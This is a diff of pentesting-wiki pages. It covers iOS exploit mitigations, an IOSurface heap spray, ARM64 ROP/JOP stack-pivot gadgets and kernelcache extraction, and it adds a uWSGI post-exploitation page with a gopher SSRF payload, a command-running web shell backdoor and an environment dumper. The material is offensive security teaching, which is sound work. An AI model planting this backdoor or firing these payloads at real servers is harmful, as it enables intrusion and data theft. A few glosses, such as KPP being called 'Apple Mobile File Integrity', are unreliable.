- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple’s trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
|
||||
- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple’s root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
|
||||
- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
|
||||
- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
|
||||
- **KASLR (Kernel ASLR)** applies the same randomization concept to the iOS kernel. By shuffling the kernel’s base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
|
||||
- **Kernel Patch Protection (KPP)** also known as **AMCC (Apple Mobile File Integrity)** in iOS, continuously monitors the kernel’s code pages to ensure they haven’t been modified. If any tampering is detected—such as an exploit trying to patch kernel functions or insert malicious code—the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can’t simply hook or patch kernel instructions without triggering a system crash.
|
||||
- **Kernel Text Readonly Region (KTRR)** is a hardware-based security feature introduced on iOS devices. It uses the CPU’s memory controller to mark the kernel’s code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers—and even privileged code—from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
|
||||
- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.
|
||||
- **Privilege Access never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
|
||||
- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Physical use-after-free
|
||||
@ -80,7 +67,7 @@ A **physical use-after-free** (UAF) occurs when:
|
||||
|
||||
This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**.
|
||||
|
||||
### Exploitation Strategy: Heap Spray
|
||||
### IOSurface Heap Spray
|
||||
|
||||
Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called **heap spray**:
|
||||
|
||||
@ -91,6 +78,13 @@ Since the attacker can’t control which specific kernel pages will be allocated
|
||||
|
||||
More info about this in [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
|
||||
|
||||
> [!TIP]
|
||||
> Be aware that iOS 16+ (A12+) devices bring hardware mitigations (like PPL or SPTM) that make physical UAF techniques far less viable.
|
||||
> PPL enforces strict MMU protections on pages related to code signing, entitlements, and sensitive kernel data, so, even if a page gets reused, writes from userland or compromised kernel code to PPL-protected pages are blocked.
|
||||
> Secure Page Table Monitor (SPTM) extends PPL by hardening page table updates themselves. It ensures that even privileged kernel code cannot silently remap freed pages or tamper with mappings without going through secure checks.
|
||||
> KTRR (Kernel Text Read-Only Region), which locks down the kernel’s code section as read-only after boot. This prevents any runtime modifications to kernel code, closing off a major attack vector that physical UAF exploits often rely on.
|
||||
> Moreover, `IOSurface` allocations are less predictable and harder to map into user-accessible regions, which makes the “magic value scanning” trick much less reliable. And `IOSurface` is now guarded by entitlements and sandbox restrictions.
|
||||
|
||||
### Step-by-Step Heap Spray Process
|
||||
|
||||
1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value").
|
||||
@ -226,5 +220,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
|
||||
|
||||
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
|
||||
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -1,4 +1,4 @@
|
||||
# ROP - Return Oriented Programing
|
||||
# ROP & JOP
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -146,18 +146,149 @@ In this example:
|
||||
> [!TIP]
|
||||
> Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
||||
|
||||
## ROP chain in ARM64 Example
|
||||
|
||||
### **ARM64 Basics & Calling conventions**
|
||||
|
||||
Check the following page for this information:
|
||||
## ROP chain in ARM64
|
||||
|
||||
Regarding **ARM64 Basics & Calling conventions**, check the following page for this information:
|
||||
|
||||
{{#ref}}
|
||||
../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
|
||||
## Protections Against ROP
|
||||
> [!DANGER]
|
||||
> It's important to notice taht when jumping to a function using a ROP in **ARM64** you should jump to the 2nd instruction of the funciton (at least) to prevent storing in the stack the current stack pointer and end up in an eternal loop calling the funciton once and again.
|
||||
|
||||
### Finding gadgets in system Dylds
|
||||
|
||||
The system libraries comes compiled in one single file called **dyld_shared_cache_arm64**. This file contains all the system libraries in a compressed format. To download this file from the mobile device you can do:
|
||||
|
||||
```bash
|
||||
scp [-J <domain>] root@10.11.1.1:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 .
|
||||
# -Use -J if connecting through Corellium via Quick Connect
|
||||
```
|
||||
|
||||
Then, you cna use a couple of tools to extract the actual libraries from the dyld_shared_cache_arm64 file:
|
||||
|
||||
- [https://github.com/keith/dyld-shared-cache-extractor](https://github.com/keith/dyld-shared-cache-extractor)
|
||||
- [https://github.com/arandomdev/DyldExtractor](https://github.com/arandomdev/DyldExtractor)
|
||||
|
||||
```bash
|
||||
brew install keith/formulae/dyld-shared-cache-extractor
|
||||
dyld-shared-cache-extractor dyld_shared_cache_arm64 dyld_extracted
|
||||
```
|
||||
|
||||
Now, in order to find interesting gadgets for the binary you are exploiting, you first need to know which libraries are loaded by the binary. You can use *lldb** for this:
|
||||
|
||||
```bash
|
||||
lldb ./vuln
|
||||
br s -n main
|
||||
run
|
||||
image list
|
||||
```
|
||||
|
||||
Finally, you can use [**Ropper**](https://github.com/sashs/ropper) to find gadgets in the libraries you are interested in:
|
||||
|
||||
```bash
|
||||
# Install
|
||||
python3 -m pip install ropper --break-system-packages
|
||||
ropper --file libcache.dylib --search "mov x0"
|
||||
```
|
||||
|
||||
## JOP - Jump Oriented Programming
|
||||
|
||||
JOP is a similar technique to ROP, but each gadget, instead of using a RET instruction ad the end of the gadget, **it uses jump addresses**. This can be particularly useful in situations where ROP is not feasible, such as when there are no suitable gadgets available. This is commonly used in **ARM** architectures where the `ret` instruction is not as commonly used as in x86/x64 architectures.
|
||||
|
||||
You can use **`rop`** tools to find JOP gadgets also, for example:
|
||||
|
||||
```bash
|
||||
cd usr/lib/system # (macOS or iOS) Let's check in these libs inside the dyld_shared_cache_arm64
|
||||
ropper --file *.dylib --search "ldr x0, [x0" # Supposing x0 is pointing to the stack or heap and we control some space around there, we could search for Jop gadgets that load from x0
|
||||
```
|
||||
|
||||
Let's see an example:
|
||||
|
||||
- There is a **heap overflow that allows us to overwrite a function pointer** stored in the heap that will be called.
|
||||
- **`x0`** is pointing to the heap where we control some space
|
||||
|
||||
- From the loaded system libraries we find the following gadgets:
|
||||
|
||||
```
|
||||
0x00000001800d1918: ldr x0, [x0, #0x20]; ldr x2, [x0, #0x30]; br x2;
|
||||
0x00000001800e6e58: ldr x0, [x0, #0x20]; ldr x3, [x0, #0x10]; br x3;
|
||||
```
|
||||
|
||||
- We can use the first gadget to load **`x0`** with a pointer to **`/bin/sh`** (stored in the heap) and then load **`x2`** from **`x0 + 0x30`** with the address of **`system`** and jump to it.
|
||||
|
||||
## Stack Pivot
|
||||
|
||||
Stack pivoting is a technique used in exploitation to change the stack pointer (`RSP` in x64, `SP` in ARM64) to point to a controlled area of memory, such as the heap or a buffer on the stack, where the attacker can place their payload (usually a ROP/JOP chain).
|
||||
|
||||
Examples of Stack Pivoting chains:
|
||||
|
||||
- Example just 1 gadget:
|
||||
|
||||
```
|
||||
mov sp, x0; ldp x29, x30, [sp], #0x10; ret;
|
||||
|
||||
The `mov sp, x0` instruction sets the stack pointer to the value in `x0`, effectively pivoting the stack to a new location. The subsequent `ldp x29, x30, [sp], #0x10; ret;` instruction loads the frame pointer and return address from the new stack location and returns to the address in `x30`.
|
||||
```
|
||||
|
||||
```
|
||||
I found this gadget in libunwind.dylib
|
||||
If x0 points to a heap you control, you can control the stack pointer and move the stack to the heap, and therefore you will control the stack.
|
||||
|
||||
0000001c61a9b9c:
|
||||
ldr x16, [x0, #0xf8]; // Control x16
|
||||
ldr x30, [x0, #0x100]; // Control x30
|
||||
ldp x0, x1, [x0]; // Control x1
|
||||
mov sp, x16; // Control sp
|
||||
ret; // ret will jump to x30, which we control
|
||||
|
||||
To use this gadget you could use in the heap something like:
|
||||
<address of x0 to keep x0> # ldp x0, x1, [x0]
|
||||
<address of gadget> # Let's suppose this is the overflowed pointer that allows to call the ROP chain
|
||||
"A" * 0xe8 (0xf8-16) # Fill until x0+0xf8
|
||||
<address x0+16> # Lets point SP to x0+16 to control the stack
|
||||
<next gadget> # This will go into x30, which will be called with ret (so add of 2nd gadget)
|
||||
```
|
||||
|
||||
- Example multiple gadgets:
|
||||
|
||||
```
|
||||
// G1: Typical PAC epilogue that restores frame and returns
|
||||
// (seen in many leaf/non-leaf functions)
|
||||
G1:
|
||||
ldp x29, x30, [sp], #0x10 // restore FP/LR
|
||||
autiasp // **PAC check on LR**
|
||||
retab // **PAC-aware return**
|
||||
|
||||
// G2: Small helper that (dangerously) moves SP from FP
|
||||
// (appears in some hand-written helpers / stubs; good to grep for)
|
||||
G2:
|
||||
mov sp, x29 // **pivot candidate**
|
||||
ret
|
||||
|
||||
// G3: Reader on the new stack (common prologue/epilogue shape)
|
||||
G3:
|
||||
ldp x0, x1, [sp], #0x10 // consume args from "new" stack
|
||||
ret
|
||||
```
|
||||
|
||||
```
|
||||
G1:
|
||||
stp x8, x1, [sp] // Store at [sp] → value of x8 (attacker controlled) and at [sp+8] → value of x1 (attacker controlled)
|
||||
ldr x8, [x0] // Load x8 with the value at address x0 (controlled by attacker, address of G2)
|
||||
blr x8 // Branch to the address in x8 (controlled by attacker)
|
||||
|
||||
G2:
|
||||
ldp x29, x30, [sp], #0x10 // Loads x8 -> x29 and x1 -> x30. The value in x1 is the value for G3
|
||||
ret
|
||||
G3:
|
||||
mov sp, x29 // Pivot the stack to the address in x29, which was x8, and was controlled by the attacker possible pointing to the heap
|
||||
ret
|
||||
```
|
||||
|
||||
|
||||
## Protections Against ROP and JOP
|
||||
|
||||
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
|
||||
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain
|
||||
@ -195,6 +326,7 @@ rop-syscall-execv/
|
||||
- 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
||||
- [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||
- [https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html](https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -135,7 +135,6 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t
|
||||
|
||||
Check the example from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2lib-+-printf-leak-arm64.md
|
||||
{{#endref}}
|
||||
|
@ -29,9 +29,7 @@ clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
|
||||
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||
```
|
||||
|
||||
### Find offset
|
||||
|
||||
### x30 offset
|
||||
### Find offset - x30 offset
|
||||
|
||||
Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
|
||||
|
||||
|
@ -94,6 +94,8 @@ In my case in macOS I found it in:
|
||||
|
||||
- `/System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache`
|
||||
|
||||
Find also here the [**kernelcache of version 14 with symbols**](https://x.com/tihmstar/status/1295814618242318337?lang=en).
|
||||
|
||||
#### IMG4
|
||||
|
||||
The IMG4 file format is a container format used by Apple in its iOS and macOS devices for securely **storing and verifying firmware** components (like **kernelcache**). The IMG4 format includes a header and several tags which encapsulate different pieces of data including the actual payload (like a kernel or bootloader), a signature, and a set of manifest properties. The format supports cryptographic verification, allowing the device to confirm the authenticity and integrity of the firmware component before executing it.
|
||||
@ -137,7 +139,24 @@ nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l
|
||||
|
||||
Sometime Apple releases **kernelcache** with **symbols**. You can download some firmwares with symbols by following links on those pages. The firmwares will contain the **kernelcache** among other files.
|
||||
|
||||
To **extract** the files start by changing the extension from `.ipsw` to `.zip` and **unzip** it.
|
||||
To **extract** the kernel cache you can do:
|
||||
|
||||
```bash
|
||||
# Install ipsw tool
|
||||
brew install blacktop/tap/ipsw
|
||||
|
||||
# Extract only the kernelcache from the IPSW
|
||||
ipsw extract --kernel /path/to/YourFirmware.ipsw -o out/
|
||||
|
||||
# You should get something like:
|
||||
# out/Firmware/kernelcache.release.iPhoneXX
|
||||
# or an IMG4 payload: out/Firmware/kernelcache.release.iPhoneXX.im4p
|
||||
|
||||
# If you get an IMG4 payload:
|
||||
ipsw img4 im4p extract out/Firmware/kernelcache*.im4p -o kcache.raw
|
||||
```
|
||||
|
||||
Another option to **extract** the files start by changing the extension from `.ipsw` to `.zip` and **unzip** it.
|
||||
|
||||
After extracting the firmware you will get a file like: **`kernelcache.release.iphone14`**. It's in **IMG4** format, you can extract the interesting info with:
|
||||
|
||||
@ -153,6 +172,16 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon
|
||||
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
```bash
|
||||
pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
[**img4tool**](https://github.com/tihmstar/img4tool)**:**
|
||||
|
||||
```bash
|
||||
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
### Inspecting kernelcache
|
||||
|
||||
Check if the kernelcache has symbols with
|
||||
|
@ -22,7 +22,7 @@ Port rights, which define what operations a task can perform, are key to this co
|
||||
|
||||
- **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe).
|
||||
- A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **own task has Receive right over its por**t.
|
||||
- If the owner of the Receive right **dies** or kills it, the **send right became useless (dead name).**
|
||||
- If the owner of the Receive right **dies** or kills it, the **send right becomes useless (dead name).**
|
||||
- **Send right**, which allows sending messages to the port.
|
||||
- The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**.
|
||||
- Note that **port rights** can also be **passed** though Mac messages.
|
||||
|
179
src/network-services-pentesting/pentesting-web/wsgi.md
Normal file
179
src/network-services-pentesting/pentesting-web/wsgi.md
Normal file
@ -0,0 +1,179 @@
|
||||
# WSGI Post-Exploitation Tricks
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## WSGI Overview
|
||||
|
||||
Web Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request. uWSGI is one of the most popular WSGI servers, often used to serve Python web applications.
|
||||
|
||||
## uWSGI Magic Variables Exploitation
|
||||
|
||||
uWSGI provides special "magic variables" that can be used to dynamically configure the server behavior. These variables can be set through HTTP headers and may lead to serious security vulnerabilities when not properly validated.
|
||||
|
||||
### Key Exploitable Variables
|
||||
|
||||
#### `UWSGI_FILE` - Arbitrary File Execution
|
||||
|
||||
```
|
||||
uwsgi_param UWSGI_FILE /path/to/python/file.py;
|
||||
```
|
||||
This variable allows loading and executing arbitrary Python files as WSGI applications. If an attacker can control this parameter, they can achieve Remote Code Execution (RCE).
|
||||
|
||||
#### `UWSGI_SCRIPT` - Script Loading
|
||||
```
|
||||
uwsgi_param UWSGI_SCRIPT module.path:callable;
|
||||
uwsgi_param SCRIPT_NAME /endpoint;
|
||||
```
|
||||
Loads a specified script as a new application. Combined with file upload or write capabilities, this can lead to RCE.
|
||||
|
||||
#### `UWSGI_MODULE` and `UWSGI_CALLABLE` - Dynamic Module Loading
|
||||
```
|
||||
uwsgi_param UWSGI_MODULE malicious.module;
|
||||
uwsgi_param UWSGI_CALLABLE evil_function;
|
||||
uwsgi_param SCRIPT_NAME /backdoor;
|
||||
```
|
||||
These parameters allow loading arbitrary Python modules and calling specific functions within them.
|
||||
|
||||
#### `UWSGI_SETENV` - Environment Variable Manipulation
|
||||
```
|
||||
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
|
||||
```
|
||||
Can be used to modify environment variables, potentially affecting application behavior or loading malicious configuration.
|
||||
|
||||
#### `UWSGI_PYHOME` - Python Environment Manipulation
|
||||
```
|
||||
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
|
||||
```
|
||||
Changes the Python virtual environment, potentially loading malicious packages or different Python interpreters.
|
||||
|
||||
#### `UWSGI_CHDIR` - Directory Traversal
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /etc/;
|
||||
```
|
||||
Changes the working directory before processing requests, which can be used for path traversal attacks.
|
||||
|
||||
## SSRF + Gopher to
|
||||
|
||||
### The Attack Vector
|
||||
|
||||
When uWSGI is accessible through SSRF (Server-Side Request Forgery), attackers can interact with the internal uWSGI socket to exploit magic variables. This is particularly dangerous when:
|
||||
|
||||
1. The application has SSRF vulnerabilities
|
||||
2. uWSGI is running on an internal port/socket
|
||||
3. The application doesn't properly validate magic variables
|
||||
|
||||
uWSGI is accessible due to SSRF because the config file `uwsgi.ini` contains: `socket = 127.0.0.1:5000` making it accessible from the web application through SSRF.
|
||||
|
||||
### Exploitation Example
|
||||
|
||||
#### Step 1: Create Malicious Payload
|
||||
First, inject Python code into a file accessible by the server (file write inside the server, the extension of the file doesn't matter):
|
||||
```python
|
||||
# Payload injected into a JSON profile file
|
||||
import os
|
||||
os.system("/readflag > /app/profiles/result.json")
|
||||
```
|
||||
|
||||
#### Step 2: Craft uWSGI Protocol Request
|
||||
Use Gopher protocol to send raw uWSGI packets:
|
||||
```
|
||||
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
|
||||
```
|
||||
|
||||
This payload:
|
||||
- Connects to uWSGI on port 5000
|
||||
- Sets `UWSGI_FILE` to point to the malicious file
|
||||
- Forces uWSGI to load and execute the Python code
|
||||
|
||||
### uWSGI Protocol Structure
|
||||
|
||||
The uWSGI protocol uses a binary format where:
|
||||
- Variables are encoded as length-prefixed strings
|
||||
- Each variable has: `[name_length][name][value_length][value]`
|
||||
- The packet starts with a header containing the total size
|
||||
|
||||
## Post-Exploitation Techniques
|
||||
|
||||
### 1. Persistent Backdoors
|
||||
|
||||
#### File-based Backdoor
|
||||
```python
|
||||
# backdoor.py
|
||||
import subprocess
|
||||
import base64
|
||||
|
||||
def application(environ, start_response):
|
||||
cmd = environ.get('HTTP_X_CMD', '')
|
||||
if cmd:
|
||||
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
|
||||
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
|
||||
else:
|
||||
response = "Backdoor active"
|
||||
|
||||
start_response('200 OK', [('Content-Type', 'text/plain')])
|
||||
return [response.encode()]
|
||||
```
|
||||
|
||||
Then use `UWSGI_FILE` to load this backdoor:
|
||||
```
|
||||
uwsgi_param UWSGI_FILE /tmp/backdoor.py;
|
||||
uwsgi_param SCRIPT_NAME /admin;
|
||||
```
|
||||
|
||||
#### Environment-based Persistence
|
||||
```
|
||||
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;
|
||||
```
|
||||
|
||||
### 2. Information Disclosure
|
||||
|
||||
#### Environment Variable Dumping
|
||||
```python
|
||||
# env_dump.py
|
||||
import os
|
||||
import json
|
||||
|
||||
def application(environ, start_response):
|
||||
env_data = {
|
||||
'os_environ': dict(os.environ),
|
||||
'wsgi_environ': dict(environ)
|
||||
}
|
||||
|
||||
start_response('200 OK', [('Content-Type', 'application/json')])
|
||||
return [json.dumps(env_data, indent=2).encode()]
|
||||
```
|
||||
|
||||
#### File System Access
|
||||
Use `UWSGI_CHDIR` combined with file serving to access sensitive files:
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /etc/;
|
||||
uwsgi_param UWSGI_FILE /app/file_server.py;
|
||||
```
|
||||
|
||||
### 3. Privilege Escalation
|
||||
|
||||
#### Socket Manipulation
|
||||
If uWSGI runs with elevated privileges, attackers might manipulate socket permissions:
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /tmp;
|
||||
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;
|
||||
```
|
||||
|
||||
#### Configuration Override
|
||||
```python
|
||||
# malicious_config.py
|
||||
import os
|
||||
|
||||
# Override uWSGI configuration
|
||||
os.environ['UWSGI_MASTER'] = '1'
|
||||
os.environ['UWSGI_PROCESSES'] = '1'
|
||||
os.environ['UWSGI_CHEAPER'] = '1'
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [uWSGI Magic Variables Documentation](https://uwsgi-docs.readthedocs.io/en/latest/Vars.html)
|
||||
- [IOI SaveData CTF Writeup](https://bugculture.io/writeups/web/ioi-savedata)
|
||||
- [uWSGI Security Best Practices](https://uwsgi-docs.readthedocs.io/en/latest/Security.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -54,11 +54,11 @@ Some examples from [**this post**](https://www.certik.com/resources/blog/web2-me
|
||||
|
||||
### Wasting Funds: Forcing backend to perform transactions
|
||||
|
||||
In the scenario **`Wasted Crypto in Gas via Unrestricted API`**, the attacke can force the backend to call functions of a smart contract that will consume gas. The attacker, just sending an ETH account number and with no limits, will force backend to call the smart contrat to register it, which will consume gas.
|
||||
In the scenario **`Wasted Crypto in Gas via Unrestricted API`**, the attacker can force the backend to call functions of a smart contract that will consume gas. The attacker, just sending an ETH account number and with no limits, will force backend to call the smart contract to register it, which will consume gas.
|
||||
|
||||
### DoS: Poor transaction handling time
|
||||
|
||||
In the scenario **`Poor Transaction Time Handling Leads to DoS`**, is explained that because the backend will the HTTP request open until a transaction is performed, a user can easly send several HTTP requests to the backend, which will consume all the resources of the backend and will lead to a DoS.
|
||||
In the scenario **`Poor Transaction Time Handling Leads to DoS`**, is explained that because the backend will the HTTP request open until a transaction is performed, a user can easily send several HTTP requests to the backend, which will consume all the resources of the backend and will lead to a DoS.
|
||||
|
||||
### Backend<-->Blockchain desync - Race condition
|
||||
|
||||
|
@ -90,6 +90,14 @@ Payloads example:
|
||||
</div>
|
||||
```
|
||||
|
||||
### Gopher
|
||||
|
||||
Use gopher to send arbitrary requests to internal services with arbitrary data:
|
||||
|
||||
```
|
||||

|
||||
```
|
||||
|
||||
### Fuzzing
|
||||
|
||||
```html
|
||||
|
Loading…
x
Reference in New Issue
Block a user